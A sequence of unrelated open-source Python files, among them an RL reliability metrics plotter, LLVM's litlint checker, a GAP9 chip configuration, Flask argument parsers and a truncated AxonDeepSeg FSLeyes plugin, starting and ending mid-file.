[int(x) for x in fin.readline().split()] fields = [ex_id, n, k, d] def get_flag(x): if x == '(name Ao)': return 'G' elif x == '(name Ax)': return 'F' elif x == '(name Bo)': return 'g' elif x == '(name Bx)': return 'f' elif x == '(name X)': return 'X' else: assert x is None or x == 'null' return None # Read Turk data with gzip.open(os.path.join(exec_dir, 'check-denotations', 'nt-{}.gz'.format(ex_id))) as fin: _, _, _, _, check_grid = read_denotation_file(ex_id, fin) check_grid = [[get_flag(x) for x in y] for y in check_grid] if n > 0: used_indices = [i for (i,x) in enumerate(check_grid[0]) if x is not None] flags = [check_grid[0][i] for i in used_indices] else: used_indices = [] flags = [] fields.append(''.join([{'G': 'A', 'F': 'A', 'B': 'B', 'g': 'B', 'f': 'B', 'X': 'X', None: '?'}[x] for x in flags])) # Get the "correct" derivations corrects = [] cur_i = 0 with gzip.open(formula_path) as fin: for line in fin: line = line.strip() if line.startswith('(derivation (formula'): if all(check_grid[cur_i][i] != 'F' for i in used_indices): corrects.append(line) cur_i += 1 fields.append(len(corrects)) # Dump matching formulas with gzip.open(os.path.join(outdir, 'nt-{}.gz'.format(ex_id)), 'w') as fout: for correct in corrects: print >> fout, correct print '\t'.join(str(x) for x in fields) sys.stdout.flush() def main(): parser = argparse.ArgumentParser() parser.add_argument('-s', '--step', type=int, default=1) parser.add_argument('-a', '--annotation-dir', help='directory to search for dumped annotated formula denotations') parser.add_argument('-r', '--retained-tables', help='path to retained-tables file') parser.add_argument('-z', '--sizes-dir', help='path to sizes directory') parser.add_argument('-f', '--formulas-dir', help='path to formulas directory') parser.add_argument('-e', '--exec-dir', help='path to exec dir with denotations, annotated-denotations, check-*') parser.add_argument('-R', '--range', nargs=2, type=int, help='range of example ids') parser.add_argument('denotation_dir', help='directory to search for dumped denotations') parser.add_argument('-o', '--outdir', help='output directory') args = parser.parse_args() # Read denotation directories ex_id_to_path = {} directory = args.denotation_dir for filename in os.listdir(directory): match = re.match(r'nt-(\d+)\.gz', filename) assert match, filename ex_id_to_path[int(match.group(1))] = os.path.join(directory, filename) print >> sys.stderr, 'There are', len(ex_id_to_path), 'denotation files' ex_id_to_ann_path = {} if args.annotation_dir: directory = args.annotation_dir for filename in os.listdir(directory): match = re.match(r'nt-(\d+)\.gz', filename) assert match, filename ex_id_to_ann_path[int(match.group(1))] = os.path.join(directory, filename) print >> sys.stderr, 'There are', len(ex_id_to_ann_path), 'annotated denotation files' ex_id_to_size_path = {} if args.sizes_dir: directory = args.sizes_dir for filename in os.listdir(directory): match = re.match(r'nt-(\d+)', filename) assert match, filename ex_id_to_size_path[int(match.group(1))] = os.path.join(directory, filename) print >> sys.stderr, 'There are', len(ex_id_to_size_path), 'annotated sizes files' ex_id_to_formula_path = {} if args.formulas_dir: directory = args.formulas_dir for filename in os.listdir(directory): match = re.match(r'nt-(\d+)(\.gz)?', filename) assert match, filename ex_id_to_formula_path[int(match.group(1))] = os.path.join(directory, filename) print >> sys.stderr, 'There are', len(ex_id_to_formula_path), 'annotated formulas files' if args.retained_tables: ret_data = {} with open(args.retained_tables) as fin: for line in fin: line = line[:-1].split('\t') ex_id = int(line[0][3:]) score = float(line[1]) chosen = [int(x) for x in line[2].split()] ret_data[ex_id] = (score, chosen) print >> sys.stderr, 'STEP:', args.step for i, ex_id in enumerate(sorted(ex_id_to_path)): if i % 20 == 0: print >> sys.stderr, 'Processing', i if args.range and not (args.range[0] <= i <= args.range[1]): continue with gzip.open(ex_id_to_path[ex_id]) as fin: if args.step == 1: process1(i, fin) elif args.step == 2: process2(i, fin) elif args.step == 3: process3(i, fin) elif args.step == 5: with gzip.open(ex_id_to_ann_path[ex_id]) as ann_fin: process5(i, fin, ann_fin, ret_data[ex_id], ex_id_to_size_path.get(i), ex_id_to_formula_path.get(i)) elif args.step == 6: with gzip.open(ex_id_to_ann_path[ex_id]) as ann_fin: process6(i, fin, ann_fin, ex_id_to_size_path.get(i), ex_id_to_formula_path.get(i), args.exec_dir) elif args.step == 7: assert args.outdir if not os.path.exists(args.outdir): os.makedirs(args.outdir) with gzip.open(ex_id_to_ann_path[ex_id]) as ann_fin: process7(i, fin, ann_fin, ex_id_to_size_path.get(i), ex_id_to_formula_path.get(i), args.exec_dir, args.outdir) elif args.step == 8: assert args.outdir if not os.path.exists(args.outdir): os.makedirs(args.outdir) process8(i, fin, ex_id_to_formula_path.get(i), args.exec_dir, args.outdir) print >> sys.stderr, 'DONE!' if __name__ == '__main__': main()
rl_reliability_metrics/analysis/plotter.py
mcx/rl-reliability-metrics
122
12686781
# coding=utf-8 # Copyright 2019 The Authors of RL Reliability Metrics. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Class for making plots of robustness metric results and statistics.""" import datetime import math import os from absl import logging from matplotlib import pyplot as plt import numpy as np from rl_reliability_metrics.analysis import io_utils_oss as io_utils from rl_reliability_metrics.analysis import plot_utils from rl_reliability_metrics.analysis import stats from rl_reliability_metrics.analysis import stats_utils # Internal gfile dependencies HATCH_PATTERNS = ('-', '/', '.', 'O', '+', 'o', 'x', '*', '\\') ALGO_COLORS = ('r', 'y', 'g', 'b', 'm') MARKERS = ('o', 's', 'v', '^', '<', '>') TIMEFRAME_NAMES = ['Beginning', 'Middle', 'End'] UP_ARROW = r' $\uparrow$' DOWN_ARROW = r' $\downarrow$' class Plotter(object): """Class for making plots of metric results and statistics.""" def __init__(self, data, pvals_dir, confidence_intervals_dir, n_timeframes, algorithms=None, out_dir=None, pthresh=0.01, multiple_comparisons_method='benjamini-yekutieli', subplot_axis_labels=True, make_legend=False): """Initialize Plotter object. Args: data: DataDef object containing all the metric results. pvals_dir: Path to directory containing p-values for comparisons between pairs of algorithms. confidence_intervals_dir: Path to directory containing bootstrap confidence intervals. n_timeframes: Total number of timeframes we are dividing each run into. algorithms: If specified, these algorithms will be plotted, in this order. If None, we plot all algorithms available in the data (order not guaranteed). out_dir: Path to directory where we save the plot images. If None, we simply display the images without saving. pthresh: p-value threshold for significance. multiple_comparisons_method: String indicating method to use for multiple comparisons correction. See self._do_multiple_comparisons_correction for options. subplot_axis_labels: Whether to add x- and y-axis labels for each subplot. make_legend: Whether to make a legend. """ self.data_def = data self.pvals_dir = pvals_dir self.confidence_intervals_dir = confidence_intervals_dir self.n_timeframes = n_timeframes self.out_dir = out_dir self.pthresh = pthresh self.multiple_comparisons_method = multiple_comparisons_method self.subplot_axis_labels = subplot_axis_labels self.make_legend = make_legend # Parse information from data_def self.dataset = self.data_def.dataset self.algorithms = algorithms if algorithms else self.data_def.algorithms self.n_algo = len(self.algorithms) self.n_task = len(self.data_def.tasks) # Bonferroni-corrected p-value threshold self.pthresh_corrected = stats_utils.multiple_comparisons_correction( self.n_algo, self.pthresh, self.multiple_comparisons_method) def make_plots(self, metric): """Make all plots for a given metric. Args: metric: String name of the metric. """ plot_utils.paper_figure_configs() # Create a metric-specific StatsRunner object stats_runner = stats.StatsRunner(self.data_def, metric, self.n_timeframes) result_dims = stats_runner.result_dims if result_dims == 'ATRP': # Within-runs metric with eval points. self._make_plots_with_eval_points(metric, stats_runner) elif result_dims == 'ATR': # Within-runs metrics without eval points (one value per run). self._make_plots_no_eval_points(metric, stats_runner) elif result_dims == 'ATP': # Across-runs metric with eval points self._make_plots_with_eval_points(metric, stats_runner) else: raise ValueError('plotting not implemented for result_dims: %s' % result_dims) def _save_fig(self, metric, plot_name): timestamp = datetime.datetime.now().strftime('%Y%m%d_%H%M%S_%f') filepath = os.path.join(self.out_dir, '%s__%s__%s.png' % (metric, plot_name, timestamp)) io_utils.makedirs(os.path.dirname(filepath)) with open(filepath, 'wb') as f: plt.savefig(f) logging.info('Plot output to: %s', filepath) def _make_plots_with_eval_points(self, metric, stats_runner): """Make plots for a metric evaluated at multiple evaluation points per run. e.g. 'ATP' or 'ATRP' metrics. Plot 1: raw metric values per task. * One subplot per task. * Each subplot contains a plot showing the metric values across evaluation points. For ATRP metrics, we show the median metric values and fill plots indicating the IQR at each evaluation point. Plot 2: Mean rankings across tasks. * One subplot per timeframe. * One bar plot showing the mean ranking for each algorithm, and horizontal line segments indicating which pairs of algorithms are statistically different. Args: metric: String specifying the metric. stats_runner: StatsRunner object """ # Set up figure for per-task raw values. subplot_ncol_1 = 4 n_subplots_1 = self.n_task + 1 if self.make_legend else self.n_task subplot_nrow_1 = math.ceil(n_subplots_1 / subplot_ncol_1) fig1 = plt.figure(figsize=(4 * subplot_ncol_1, 4 * subplot_nrow_1)) # Set up figure for mean rankings. subplot_ncol_2 = self.n_timeframes if self.make_legend: subplot_ncol_2 += 1 subplot_nrow_2 = 1 fig2 = plt.figure(figsize=(4 * subplot_ncol_2, 4 * subplot_nrow_2)) ##=== Plot 1: Raw metric values per task ===## plt.figure(fig1.number) eval_point_idxs = stats_runner.get_timeframe_points(None) eval_point_values = self.data_def.metric_params[metric]['eval_points'] metric_results = stats_runner.load_metric_results( self.algorithms, eval_point_idxs, collapse_on_timepoints=False) result_dims = stats_runner.result_dims for i_task in range(self.n_task): plt.subplot(subplot_nrow_1, subplot_ncol_1, i_task + 1) task_results = np.squeeze(metric_results[:, i_task]) if len(eval_point_idxs) == 1: task_results = np.expand_dims(task_results, -1) if result_dims == 'ATP': # For across-run metrics, we plot a single curve. for i_algo in range(self.n_algo): plt.plot(eval_point_values, task_results[i_algo, :], marker=MARKERS[i_algo]) if self.subplot_axis_labels: plt.xlabel('evaluation points', fontsize=16) plt.ylabel('metric values', fontsize=16) elif result_dims == 'ATRP': # For per-run metrics, we plot the median and IQR across curves. for i_algo in range(self.n_algo): algo_color = ALGO_COLORS[i_algo] task_algo_results = task_results[i_algo] # n_runs x n_eval_points result_medians = np.median(task_algo_results, axis=0) result_quartile1 = np.percentile(task_algo_results, q=25, axis=0) result_quartile3 = np.percentile(task_algo_results, q=75, axis=0) plt.plot(eval_point_values, result_medians, algo_color, marker=MARKERS[i_algo]) plt.fill_between( eval_point_values, result_quartile1, result_quartile3, alpha=0.3, color=algo_color) if self.subplot_axis_labels: plt.xlabel('evaluation points', fontsize=16) plt.ylabel('metric values', fontsize=16) else: raise ValueError('result_dims must be ATP or ATRP, not %s' % result_dims) plot_utils.simple_axis(plt.gca()) plt.title(self.data_def.tasks[i_task]) # plot the legend if self.make_legend: plt.subplot(subplot_nrow_1, subplot_ncol_1, n_subplots_1) self._lineplot_legend() ##=== Plot 2: Mean rankings (mean across tasks) ===## for timeframe in range(self.n_timeframes): # Load data for plotting. timeframe_points = stats_runner.get_timeframe_points(timeframe) pvals = self._load_pvals(metric, timeframe) confidence_intervals = self._load_confidence_intervals( metric, stats_runner, timeframe) plt.figure(fig2.number) metric_results = stats_runner.load_metric_results( self.algorithms, timeframe_points, collapse_on_timepoints=True) plt.subplot(subplot_nrow_2, subplot_ncol_2, timeframe + 1) self._plot_bars_and_significant_differences(metric_results, pvals, confidence_intervals, stats_runner) plt.title(TIMEFRAME_NAMES[timeframe], fontsize=14) # plot the legend if self.make_legend: plt.subplot(subplot_nrow_2, subplot_ncol_2, subplot_ncol_2) self._barplot_legend() ##=== Wrap up the figures ===## for fig, plot_name in [(fig1, 'per-task_raw'), (fig2, 'mean_rankings')]: if plot_name == 'per-task_raw': suptitle_suffix = ( UP_ARROW if stats_runner.bigger_is_better else DOWN_ARROW) else: suptitle_suffix = '' plt.figure(fig.number, plot_name) self._wrap_up_figure(metric, plot_name, suptitle_suffix) def _make_plots_no_eval_points(self, metric, stats_runner): """Make plots for a metric without evaluation points (one value per run). e.g. 'ATR' metrics. Plot 1: Raw metric values per task. * One subplot per task. * Each subplot contains a box-and-whisker plot showing the median metric values for each algorithm, a box indicating 1st and 3rd quartiles, and whiskers indicating the minimum and maximum values (excluding outliers, defined as being outside 1.5x the inter-quartile range from the 1st and 3rd quartiles). Plot 2: Mean rankings across tasks. * One bar plot showing the mean ranking for each algorithm, and horizontal line segments indicating which pairs of algorithms are statistically different. Args: metric: String specifying the metric. stats_runner: StatsRunner object """ # Load data for plotting. metric_results = stats_runner.load_metric_results( self.algorithms, timeframe_points=None) pvals = self._load_pvals(metric) confidence_intervals = self._load_confidence_intervals(metric, stats_runner) ##=== Plot 1: Raw metric values per task ===## # Set up figure. subplot_ncol = 4 n_subplot = self.n_task if self.make_legend: n_subplot += 1 subplot_nrow = math.ceil(n_subplot / subplot_ncol) plt.figure(figsize=(4 * subplot_ncol, 4 * subplot_nrow)) # Plot the raw metric values as box-and-whisker plots. for i_task in range(self.n_task): plt.subplot(subplot_nrow, subplot_ncol, i_task + 1) task_results = np.squeeze(metric_results[:, i_task, :]) boxplot = plt.boxplot(task_results.T, patch_artist=True) for part in ['boxes', 'whiskers', 'fliers', 'means', 'medians', 'caps']: plt.setp(boxplot[part], color='k') for i_patch, patch in enumerate(boxplot['boxes']): patch.set(facecolor=ALGO_COLORS[i_patch]) plt.title(self.data_def.tasks[i_task], fontsize=16) self._configure_axes('Raw metric values') self._extend_ylims_past_zero(task_results) plot_utils.simple_axis(plt.gca()) if self.make_legend: plt.subplot(subplot_nrow, subplot_ncol, n_subplot) self._barplot_legend() # Wrap up the figure. suptitle_suffix = ( UP_ARROW if stats_runner.bigger_is_better else DOWN_ARROW) self._wrap_up_figure( metric, plot_name='per-task_raw', suptitle_suffix=suptitle_suffix) ##=== Plot 2: Mean rankings (mean across tasks) ===## # Set up figure. subplot_ncol = 2 if self.make_legend else 1 subplot_nrow = 1 plt.figure(figsize=(4 * subplot_ncol, 4 * subplot_nrow)) # Plot mean rankings and show statistical differences plt.subplot(subplot_nrow, subplot_ncol, 1) self._plot_bars_and_significant_differences(metric_results, pvals, confidence_intervals, stats_runner) plot_utils.simple_axis(plt.gca()) # plot the legend if self.make_legend: plt.subplot(subplot_nrow, subplot_ncol, subplot_ncol) self._barplot_legend() # Wrap up the figure. self._wrap_up_figure(metric, plot_name='mean_rankings') def _wrap_up_figure(self, metric, plot_name, suptitle_suffix=''): """Add suptitle, set tight layout, and save the figure.""" plt.suptitle( plot_utils.METRICS_DISPLAY_NAMES[metric] + suptitle_suffix, fontsize=14) plt.tight_layout(rect=[0, 0.03, 1, 0.95]) if self.out_dir: self._save_fig(metric, plot_name) def _load_pvals(self, metric, timeframe=None): """Load previously computed p-values. Args: metric: Which metric we are plotting. timeframe: Which timeframe we are plotting. Set None if irrelevant (for metrics that are not evaluated at specific eval points). Returns: Dictionary of p-values, with entries {'algo1.algo2': pval} """ pvals = {} for algo1 in self.algorithms: for algo2 in self.algorithms: # Get path to p-value pvals_filepath = ('%s/%s_%s_%s' % (self.pvals_dir, metric, algo1, algo2)) if timeframe is not None: pvals_filepath += '_%d' % timeframe # Load the p-value with open(pvals_filepath, 'r') as f: pval = float(f.readline()) pvals['%s.%s' % (algo1, algo2)] = pval logging.info('P-values loaded:') logging.info(pvals) return pvals def _load_confidence_intervals(self, metric, stats_runner, timeframe=None): """Load previously computed confidence intervals. Args: metric: Which metric we are plotting. stats_runner: StatsRunner object timeframe: Which timeframe we are plotting. Set None if irrelevant (for metrics that are not evaluated at specific eval points). Returns: Dictionary of confidence intervals, with entries {'algo': [ci_lower, ci_upper]} """ cis = {} for algo in self.algorithms: # Get path to confidence intervals ci_filepath = '%s/%s_%s' % (self.confidence_intervals_dir, metric, algo) if timeframe is not None: ci_filepath += '_%d' % timeframe # Load the p-value with open(ci_filepath, 'r') as f: line = f.readline() ci = list(map(float, line.split(','))) # Normalize to range (1, n_metrics) if 'R' in stats_runner.result_dims: ci[0] /= self.data_def.n_runs_per_experiment ci[1] /= self.data_def.n_runs_per_experiment cis[algo] = ci logging.info('Confidence intervals loaded:') logging.info(cis) return cis def _plot_bars_and_significant_differences(self, metric_results, pvals, confidence_intervals, stats_runner): """For a single timeframe, plot mean rank and show significant differences. Args: metric_results: Numpy array with metric values. First two dimensions should be (n_algorithm, n_task) pvals: p-values on comparison between each pair of algorithms. A dict with entries {'algo1.algo2': pvalue}. confidence_intervals: Confidence intervals on mean rank for each algorithm. A dict with entries {'algo': [ci_lower, ci_upper]}. stats_runner: StatsRunner object """ ymax = 1.32 * (len(self.algorithms)) y_pval_lines = 0.83 # First get the rankings across all algos metric_ranks = stats_runner.rank_per_task(metric_results) # Get mean ranks over tasks, for each algo # (collapse across all other dimensions) extra_dims = range(1, len(metric_ranks.shape)) mean_ranks = np.mean(metric_ranks, tuple(extra_dims)) # Normalize the ranks to range (1, n_algorithms) if 'R' in stats_runner.result_dims: mean_ranks /= self.data_def.n_runs_per_experiment # Plot the mean rankings and error bars for each algo for i_algo, algo in enumerate(self.algorithms): plot_utils.flipped_errorbar( x=i_algo, y=mean_ranks[i_algo], yerr=confidence_intervals[algo], ymax=self.n_algo, bar_color=ALGO_COLORS[i_algo], hatch_pattern=HATCH_PATTERNS[i_algo], x_offset=0.6, ) # Rank order the p-values. if self.multiple_comparisons_method != 'bonferroni': # Get subset of the p-values: we don't need the reverse comparisons, and # we don't need the self comparisons. pvals_subset = {} for i_algo, algo1 in enumerate(self.algorithms): for j_algo in range(i_algo + 1, self.n_algo): algo2 = self.algorithms[j_algo] algo_str = '%s.%s' % (algo1, algo2) pvals_subset[algo_str] = pvals[algo_str] sorted_keys = sorted(pvals_subset, key=pvals_subset.get) pval_ranks = {key: rank for rank, key in enumerate(sorted_keys)} # Plot black bars indicating significant differences. n_lines_plotted = 0 for i_algo, algo1 in enumerate(self.algorithms): for j_algo in range(i_algo + 1, self.n_algo): algo2 = self.algorithms[j_algo] algo_pair_str = '%s.%s' % (algo1, algo2) if self.multiple_comparisons_method != 'bonferroni': pval_rank = pval_ranks[algo_pair_str] pthresh_corrected = self.pthresh_corrected[pval_rank] else: pthresh_corrected = self.pthresh_corrected if pvals[algo_pair_str] < pthresh_corrected: x = [i_algo + 1, j_algo + 1] y = [(y_pval_lines + n_lines_plotted * 0.03) * ymax] * 2 plt.plot(x, y, color='k') n_lines_plotted += 1 self._configure_axes('normalized mean rank', range(1, self.n_algo + 1), range(self.n_algo, 0, -1)) def _configure_axes(self, y_label, y_ticks=None, y_tick_labels=None): """Configure axis limits and labels.""" algo_abbreviations = [ plot_utils.ALGO_ABBREVIATIONS[algo] for algo in self.algorithms ] plt.xticks(range(1, self.n_algo + 1), algo_abbreviations) plt.xlim(0, len(self.algorithms) + 1) if y_ticks: plt.yticks(y_ticks) if y_tick_labels: plt.gca().set_yticklabels(y_tick_labels) if self.subplot_axis_labels: plt.xlabel('algorithm', fontsize=16) plt.ylabel(y_label, fontsize=16) plt.tick_params(top='off') @staticmethod def _extend_ylims_past_zero(data, tolerance=0.01, extension=0.1): """Extend y-axis to ensure that zero-values in the data are visible. Args: data: Data being plotted. tolerance: Determines what values are considered too close to zero. extension: Determines how far to extend the y-axis. """ ylims_orig = plt.gca().get_ylim() abs_min = np.abs(np.min(data)) abs_max = np.abs(np.max(data)) # Extend below zero. if abs_min < tolerance * abs_max: ylim_lower = -ylims_orig[1] * extension plt.ylim([ylim_lower, ylims_orig[1]]) # Extend above zero. elif abs_max < tolerance * abs_min: ylim_upper = -ylims_orig[0] * extension plt.ylim([ylims_orig[0], ylim_upper]) def _barplot_legend(self): """Plot a legend showing the color/texture for each algorithm.""" for ibox in range(self.n_algo): box_y = self.n_algo - ibox plt.scatter( 0, box_y, s=300, marker='s', facecolor=ALGO_COLORS[ibox], edgecolor='k', hatch=HATCH_PATTERNS[ibox], label=HATCH_PATTERNS[ibox]) plt.text(0.008, box_y - 0.15, self.algorithms[ibox], fontsize=14) plt.xlim(-0.01, 0.05) plot_utils.no_axis(plt.gca()) def _lineplot_legend(self): """Plot a legend showing the color/marker for each algorithm.""" for i_algo in range(self.n_algo): y = self.n_algo - i_algo color = ALGO_COLORS[i_algo] plt.plot([0, 2], [y, y], color=color) plt.plot(1, y, marker=MARKERS[i_algo], color=color) plt.text(2.5, y - 0.002, self.algorithms[i_algo], fontsize=14) ax = plt.gca() plot_utils.no_axis(ax) ax.set_axis_bgcolor('white') plt.xlim([0, 10]) plt.ylim([0, self.n_algo + 1])
compiler-rt/lib/sanitizer_common/scripts/litlint.py
medismailben/llvm-project
8,865
12686782
#!/usr/bin/env python # # litlint # # Ensure RUN commands in lit tests are free of common errors. # # If any errors are detected, litlint returns a nonzero exit code. # import optparse import re import sys # Compile regex once for all files runRegex = re.compile(r'(?<!-o)(?<!%run) %t\s') def LintLine(s): """ Validate a line Args: s: str, the line to validate Returns: Returns an error message and a 1-based column number if an error was detected, otherwise (None, None). """ # Check that RUN command can be executed with an emulator m = runRegex.search(s) if m: start, end = m.span() return ('missing %run before %t', start + 2) # No errors return (None, None) def LintFile(p): """ Check that each RUN command can be executed with an emulator Args: p: str, valid path to a file Returns: The number of errors detected. """ errs = 0 with open(p, 'r') as f: for i, s in enumerate(f.readlines(), start=1): msg, col = LintLine(s) if msg != None: errs += 1 errorMsg = 'litlint: {}:{}:{}: error: {}.\n{}{}\n' arrow = (col-1) * ' ' + '^' sys.stderr.write(errorMsg.format(p, i, col, msg, s, arrow)) return errs if __name__ == "__main__": # Parse args parser = optparse.OptionParser() parser.add_option('--filter') # ignored (options, filenames) = parser.parse_args() # Lint each file errs = 0 for p in filenames: errs += LintFile(p) # If errors, return nonzero if errs > 0: sys.exit(1)
utils/gap_configs/python/gap/gap9/gap9.py
00-01/gap_sdk
118
12686788
# # Copyright (C) 2020 GreenWaves Technologies # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import gsystree as st from gap.gap9.soc import Soc from gap.gap9.cluster import Cluster, get_cluster_name from ips.clock.clock_domain import Clock_domain from ips.clock.clock_generator import Clock_generator from ips.pmu.pmu_v4 import Pmu from ips.padframe.padframe_v1 import Padframe from ips.vendors.dolphin.rtc import Rtc class Gap9(st.Component): def __init__(self, parent, name, soc_config_file='gap/gap9/soc.json', cluster_config_file='gap/gap9/cluster.json', padframe_config_file='gap/gap9/padframe.json'): super(Gap9, self).__init__(parent, name) # # Properties # soc_config_file = self.add_property('soc_config_file', soc_config_file) cluster_config_file = self.add_property('cluster_config_file', cluster_config_file) nb_cluster = self.add_property('nb_cluster', 1) # # Components # # Padframe padframe = Padframe(self, 'padframe', config_file=padframe_config_file) # Soc clock domain soc_clock = Clock_domain(self, 'soc_clock_domain', frequency=50000000) # Clusters clock domains cluster_clocks = [] for cid in range(0, nb_cluster): cluster_name = get_cluster_name(cid) cluster_clocks.append(Clock_domain(self, cluster_name + '_clock', frequency=50000000)) # Clusters clusters = [] for cid in range(0, nb_cluster): cluster_name = get_cluster_name(cid) clusters.append(Cluster(self, cluster_name, config_file=cluster_config_file, cid=cid)) # Soc soc = Soc(self, 'soc', config_file=soc_config_file, chip=self, cluster=clusters[0]) # Fast clock fast_clock = Clock_domain(self, 'fast_clock', frequency=24576063*2) fast_clock_generator = Clock_generator(self, 'fast_clock_generator', powered_on=False, powerup_time=200000000) # Ref clock ref_clock = Clock_domain(self, 'ref_clock', frequency=65536) ref_clock_generator = Clock_generator(self, 'ref_clock_generator') # PMU pmu = Pmu(self, 'pmu', config_file='gap/gap9/pmu.json') # RTC rtc = Rtc(self, 'rtc', **soc.get_property('soc/peripherals/rtc/config')) # # Bindings # # Padframe self.bind(ref_clock_generator, 'clock_sync', padframe, 'ref_clock_pad') self.bind(padframe, 'ref_clock', soc, 'ref_clock') for name, group in padframe.get_property('groups').items(): pad_type = group.get('type') nb_cs = group.get('nb_cs') is_master = group.get('is_master') is_slave = group.get('is_slave') is_dual = group.get('is_dual') if pad_type == 'gpio': self.bind(padframe, name + '_pad', soc, name) else: if is_master: self.bind(soc, name, padframe, name) if is_dual: self.bind(padframe, name + '_in', soc, name + '_in') if is_slave: self.bind(padframe, name, soc, name) if is_dual: self.bind(soc, name + '_out', padframe, name + '_out') if nb_cs is not None: for cs in range(0, nb_cs): cs_name = name + '_cs' + str(cs) cs_data_name = name + '_cs' + str(cs) + '_data' if is_master: self.bind(padframe, cs_data_name + '_pad', self, cs_data_name) self.bind(padframe, cs_name + '_pad', self, cs_name) if is_slave: self.bind(self, cs_data_name, padframe, cs_data_name + '_pad') self.bind(self, cs_name, padframe, cs_name + '_pad') else: if is_master: self.bind(padframe, name + '_pad', self, name) if is_slave: self.bind(self, name, padframe, name + '_pad') # Soc clock domain self.bind(soc_clock, 'out', soc, 'clock') # Clusters for cid in range(0, nb_cluster): cluster = clusters[cid] self.bind(ref_clock_generator, 'clock_sync', cluster, 'ref_clock') self.bind(cluster, 'dma_irq', soc, 'dma_irq') for pe in range(0, clusters[0].get_property('nb_pe', int)): self.bind(soc, 'halt_cluster%d_pe%d' % (cid, pe), cluster, 'halt_pe%d' % pe) self.bind(cluster_clocks[cid], 'out', clusters[cid], 'clock') self.bind(soc, get_cluster_name(cid) + '_fll', cluster_clocks[cid], 'clock_in') self.bind(soc, get_cluster_name(cid) + '_input', clusters[cid], 'input') self.bind(clusters[cid], 'soc', soc, 'soc_input') # Soc self.bind(soc, 'fast_clk_ctrl', fast_clock_generator, 'power') self.bind(soc, 'ref_clk_ctrl', ref_clock_generator, 'power') self.bind(soc, 'fll_soc_clock', soc_clock, 'clock_in') # Fast clock self.bind(fast_clock, 'out', fast_clock_generator, 'clock') self.bind(fast_clock_generator, 'clock_sync', soc, 'fast_clock') self.bind(fast_clock_generator, 'clock_ctrl', fast_clock, 'clock_in') # Ref clock self.bind(ref_clock, 'out', ref_clock_generator, 'clock') # RTC self.bind(rtc, 'apb_irq', soc, 'rtc_apb_irq') self.bind(rtc, 'irq', soc, 'wakeup_rtc') self.bind(rtc, 'event', soc, 'rtc_event_in') self.bind(soc, 'rtc_input', rtc, 'input') self.bind(soc_clock, 'out', rtc, 'clock') self.bind(ref_clock_generator, 'clock_sync', rtc, 'ref_clock') # PMU self.bind(soc_clock, 'out', pmu, 'clock') self.bind(soc, 'pmu_input', pmu, 'input') self.bind(pmu, 'icu6_reset', clusters[0], 'reset') self.bind(pmu, 'icu5_reset', soc, 'reset') self.bind(ref_clock, 'out', pmu, 'ref_clock') self.bind(pmu, 'event', soc, 'event') self.bind(pmu, 'scu_ok', soc, 'scu_ok') self.bind(pmu, 'picl_ok', soc, 'picl_ok') self.bind(soc, 'wakeup_out', pmu, 'wakeup') self.bind(soc, 'wakeup_seq', pmu, 'wakeup_seq') # SOC self.bind(self, 'bootsel', soc, 'bootsel') self.bind(fast_clock, 'out', soc, 'fast_clock_out') def gen_gtkw_conf(self, tree, traces): if tree.get_view() == 'overview': self.vcd_group(self, skip=True) else: self.vcd_group(self, skip=False)
embedding-calculator/src/services/flask_/parse_request_arg.py
Precistat/CompreFace
1,779
12686801
<filename>embedding-calculator/src/services/flask_/parse_request_arg.py # Copyright (c) 2020 the original author or authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express # or implied. See the License for the specific language governing # permissions and limitations under the License. from flask import Request from src.exceptions import InvalidRequestArgumentValueError UNDEFINED = '__UNDEFINED__' def parse_request_bool_arg(name: str, default: bool, request: Request) -> bool: param_value = request.args.get(name.lower(), UNDEFINED).upper() if param_value == UNDEFINED: return default if param_value in ('TRUE', '1'): return True elif param_value in ('FALSE', '0'): return False else: raise InvalidRequestArgumentValueError(f"'{name}' parameter accepts only 'true' (or '1') and 'false' (or '0')") def parse_request_string_arg(name: str, default, allowed_values, request: Request) -> str: name = name.lower() param_value = request.args.get(name.lower(), UNDEFINED).upper() if param_value == UNDEFINED: return default allowed_values = list(allowed_values) if param_value not in allowed_values: raise InvalidRequestArgumentValueError(f"'{name}' parameter accepts only '{', '.join(allowed_values)}' values") return param_value
amazon_problems/problem_13.py
loftwah/Daily-Coding-Problem
129
12686803
"""This problem was asked by Amazon. Given a pivot x, and a list lst, partition the list into three parts. • The first part contains all elements in lst that are less than x • The second part contains all elements in lst that are equal to x • The third part contains all elements in lst that are larger than x Ordering within a part can be arbitrary. For example, given x = 10 and lst = [9, 12, 3, 5, 14, 10, 10], one partition may be `[9, 3, 5, 10, 10, 12, 14]. """
ads_plugin.py
wukathryn/axondeepseg
115
12686830
""" This is an FSLeyes plugin script that integrates AxonDeepSeg tools into FSLeyes. Author : <NAME> """ import wx import wx.lib.agw.hyperlink as hl import fsleyes.controls.controlpanel as ctrlpanel import fsleyes.actions.loadoverlay as ovLoad import numpy as np import nibabel as nib from PIL import Image, ImageDraw, ImageOps import scipy.misc import json from pathlib import Path import AxonDeepSeg from AxonDeepSeg.apply_model import axon_segmentation from AxonDeepSeg.segment import segment_image import AxonDeepSeg.morphometrics.compute_morphometrics as compute_morphs from AxonDeepSeg import postprocessing, params, ads_utils from config import axonmyelin_suffix, axon_suffix, myelin_suffix, index_suffix, axonmyelin_index_suffix import math from scipy import ndimage as ndi from skimage import measure, morphology, feature import tempfile import openpyxl import pandas as pd import imageio VERSION = "0.2.19" class ADSsettings: """ This class handles everything related to the parameters used in the ADS plugin, including the frame for the settings menu. """ def __init__(self, ads_control): """ Constructor for the ADSsettings class. Initializes the default settings. :param ads_control: An instance of 